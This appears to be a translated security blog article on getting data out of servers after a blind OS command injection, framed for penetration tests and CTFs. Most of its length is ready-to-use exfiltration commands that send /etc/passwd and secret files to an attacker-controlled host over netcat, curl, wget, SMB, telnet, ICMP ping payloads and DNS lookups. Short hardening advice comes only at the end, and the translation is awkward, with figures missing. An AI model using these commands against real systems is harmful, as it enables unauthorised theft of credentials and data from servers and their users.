Technical analysis: How can attackers use blind injection of system commands to achieve "database theft?

Technical analysis: How can attackers use blind injection of system commands to achieve "database theft?

In the penetration test or CTF challenge, you may encounter an application that requires the user to input text information, the application passes user input as a parameter to a system command or to the associated program running tasks at the underlying layer. However, we know that if the input information is not verified or filtered, the application may be used for "Operating System Command Injection ".

Attackers can exploit the injection vulnerability to execute commands with application permissions. In this context, we have observed in actual application cases that this type of attack vulnerability exists in a large number of applications. The target applications are usually the following application types:

You can send an email to an application at the specified address. Applications that can monitor the running status of enterprise servers use third-party tools based on user input to transmit reports

In penetration testing or CTF, after you confirm the vulnerability, you may start to test and analyze the areas of interest on the target host, hoping to find the trophy or other useful information, such,

Operating system password file operating system configuration file database file application source code

A basic example is to inject the Windows Command "type" as a parameter for transmission, read a file on the server, and finally return relevant text information.

 

 

In many cases, the command being executed must be interrupted. As you can imagine, when a system monitors the application software, it will ping an IP address to check whether the host is online. The IP address entered by the user is also executed at the underlying layer of the system, as shown in figure

ping –c 5 xxx.xxx.xxx.xxx

If you want to run other commands after the application has run the ping command, refer to the following injection command method:

 

 

In the previous example, we run the "type" command to return the corresponding text information on the server after the HTTP response. In the actual environment, the injection mode is often called "Operating System Command blind injection" because no output is returned after the injection command ".

In this case, how can we find useful information? The following describes in detail how to upload a web shell to the host.

NetCat

The first example is implemented by using the Swiss Army Knife netcat. I believe that Netcat is no stranger to you. For many people, it is still quite easy to use after a long time. To put it simply, it is a tool that can read, write, or connect to a TCP or UDP network. If netcat is running on the target server, you can use it to establish a listener and redirect the output system operation commands to the listener server.

Use the following pipeline to redirect files to the listener.

 nc –l –p {port} < {file/to/extract}

In this way, you can connect to the listener on the target server from your host and redirect the standard output. The following shows how to redirect/etc/passwd to the host.

 

 

If the host runs a Windows system and netcat has similar attacks, try the following command:

type {file to extract}  | nc -L -p {port}

CURL

CURL is a command line tool and library that uses multiple protocols to transmit data. It is a very useful database download tool. If the target server has a cURL, we can still use it to post files to the specified server or transmit files through other protocols, such as FTP/SCP/TFTP/TELNET.

After you have confirmed a System Operation Command Injection Vulnerability, you can use the following command to post files to the web server to transmit files over HTTP.

cat /path/to/file | curl –F “:data=@-“ http://xxx.xxx.xxx.xxxx:xxxx/test.txt

After running the preceding command, you can view the related file content in the server log. If the above operations are performed in the penetration test, the web server must also ensure that ssl is configured to protect the client data from being transmitted to the network. The following shows how to return the/etc/passwd content as a request.

 

 

 

The CURL command can also be used to transmit files through FTP. Similarly, if you can confirm an operating system command injection vulnerability, you can use the following command to transfer files to the FTP server.

curl –T {path to file} ftp://xxx.xxx.xxx.xxx –user {username}:{password}

The following describes how to use FTP to transfer files from the target server to the FTP server.

 

 

Of course, cURL can also be transmitted using other protocols, such as SCP, TFTP, or TELNET, which will not be described here.

WGET

Wget is a free tool for automatically downloading files from the network. It supports HTTP, HTTPS, and FTP protocols, and can use HTTP proxy. The so-called automatic download means that wget can still be executed in the background after the user exits the system. This means that you can log on to the system, start a wget download task, and then exit the system. wget will be executed in the background until the task is completed.

You can also use WGET to submit a request containing the header of the header to the server. The format is as follows,

–header=’name:value’

You can use this method to capture the desired data. You can set the file name path to the header value to be crawled.

wget –header=”EVIL:$(cat /data/secret/password.txt)”http://xxx.xxx.xxx:xxx

We can see the corresponding effect from the logs on the web server, as shown below,

 

 

We can also use tag tags to encapsulate a command into the data that executes the original command. The next example shows how to retrieve the/etc/passwd file.

wget –header=”evil:`cat /etc/passwd | xargs echo –n`” http://xxx.xxx.xxx:xxxx

 

 

In fact, you can also use WGET to submit a post request to our web server, and then add string data to the Request body by using '-post-data. Or use '-post-file' to transfer the file to the web server. The operation commands and effects are as follows:

wget –post-data exfil=`cat /data/secret/secretcode.txt` http://xxx.xxx.xxx.xxx:xxxx

 

 

wget –post-file trophy.php http://xxx.xxx.xxx.xxx:xxxx

 

 

SMB

Through the SMB protocol, you can establish a network sharing connection between the target server and the host, share the files on the target server, and copy the shared files on the host. The Operation Command is as follows,

net use h: \\xxx.xxx.xxx.xxx\web /user:{username} {password} && copy {File to Copy} h:\{filename}.txt

The operation results are as follows:

 

 

TELNET

If the telnet client is on a remote server, we can use this condition to transmit a file to the listener of the host and run the following command,

telnet xxx.xxx.xxx.xxx {port} < {file to transfer}

The operation results are as follows:

 

 

ICMP

If the target host you target has been reinforced, some tools such as netcat, wget, or CURL have been removed. It is difficult to download databases, but there are still some other technologies that can be used. First, let the host ping your machine and check whether ICMP packets are filtered by the firewall. If not, and the host's underlying system is Linux, we can use "-p flag" to transmit files through ICMP echo requests.

First, we need to convert the file to hexadecimal format, and then insert the data into the data packet. This can be seen through the example below,

cat password.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xxx.xxx.xxx.xxx; done

 

 

With Wireshark, we can see that the received packets already contain our data,

 

 

 

 

 

 

DNS

Similar to the ping command, DNS can also be used for database download. This time, we will use each row of data as the host name of a DNS query. By monitoring network traffic, we can reorganize data packets on our machines to restore original files. In this instance, the following command will be submitted to the server as part of our request.

cat /data/secret/password.txt | while read exfil; do host $exfil.contextis.com 192.168.107.135; done

The operation results are as follows,

 

 

You can use a script to reorganize the received DNS data packet into the original file:

 

Protection based on the above drag-and-drop method

In this article, we show how to use some methods to drag databases. So, how do you prevent such incidents?

1. If possible, avoid using user-input information as a parameter of the operating system command. 2. All user input should be verified. The best way is to add valid strings to the whitelist using the whitelist method, and filter other strings. 3. Perform regular code reviews and penetration tests to detect application vulnerabilities and quickly fix them. At the same time, we should actively follow up the repair process to confirm the success of the discovered vulnerability.

Web application servers should also be reinforced to reduce the impact of server defects as follows,

1. Remove other unnecessary tools, such as cURL, Wget, or NetCat, which can be exploited for attacks. 2. According to the minimum permission principle, keep Web service programs running with low-privilege accounts; 3. Ensure that network application logs are periodically reviewed to identify attacks from the network, the review cycle should be kept at least once every three days, preferably once a day; 4. Strengthen data traffic control internally and prevent attackers from returning data to their servers through the internal firewall.